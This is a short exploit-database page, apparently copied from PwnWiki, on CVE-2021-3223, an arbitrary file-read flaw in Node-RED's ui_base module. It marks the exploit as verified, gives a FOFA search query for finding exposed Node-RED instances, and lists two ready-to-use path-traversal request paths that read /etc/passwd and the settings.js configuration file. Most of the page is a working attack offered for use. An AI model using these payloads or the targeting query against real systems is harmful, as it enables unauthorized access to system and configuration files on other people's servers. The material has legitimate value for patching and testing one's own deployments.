CVE-2021-3223_Node-RED_ui_base_任意文件讀取漏洞

# CVE-2021-3223 Node-RED ui base 任意文件讀取漏洞/en

{| style=”border: 2.0px solid grey; background: #b3ff9c;” width=”85%”
| align=”center” width=”60px”| ![](/static/pwnwiki/img/Check.png)
| align=”center” |”’The vulnerability has been verified”’
——
The EXP/POC/Payload on this page has been tested and available, and the vulnerability has been successfully reproduced.
|}

==Vulnerability Impact==
Node-RED

==FOFA==

title="Node-RED"

==POC==

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

==Reference==
https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg

文章版权归作者所有，未经允许请勿转载。

THE END

漏洞库

CVE-2021-3223_Node-RED_ui_base_任意文件讀取漏洞_en

请登录后发表评论

1会员必看手册（1.8.6版本 25.12.1更新）

2普华科技PowerPms ForgotPassword 存在sql注入

3无境靶场练习：win11通关vulntarget-b

4XWiki Platform 文件读取 (CVE-2025-55749)

5天地伟业Easy7 queryUserbyDesc 存在SQL注入

6OffSec OSCP培训 – PEN-200 2024.11 中英双语字幕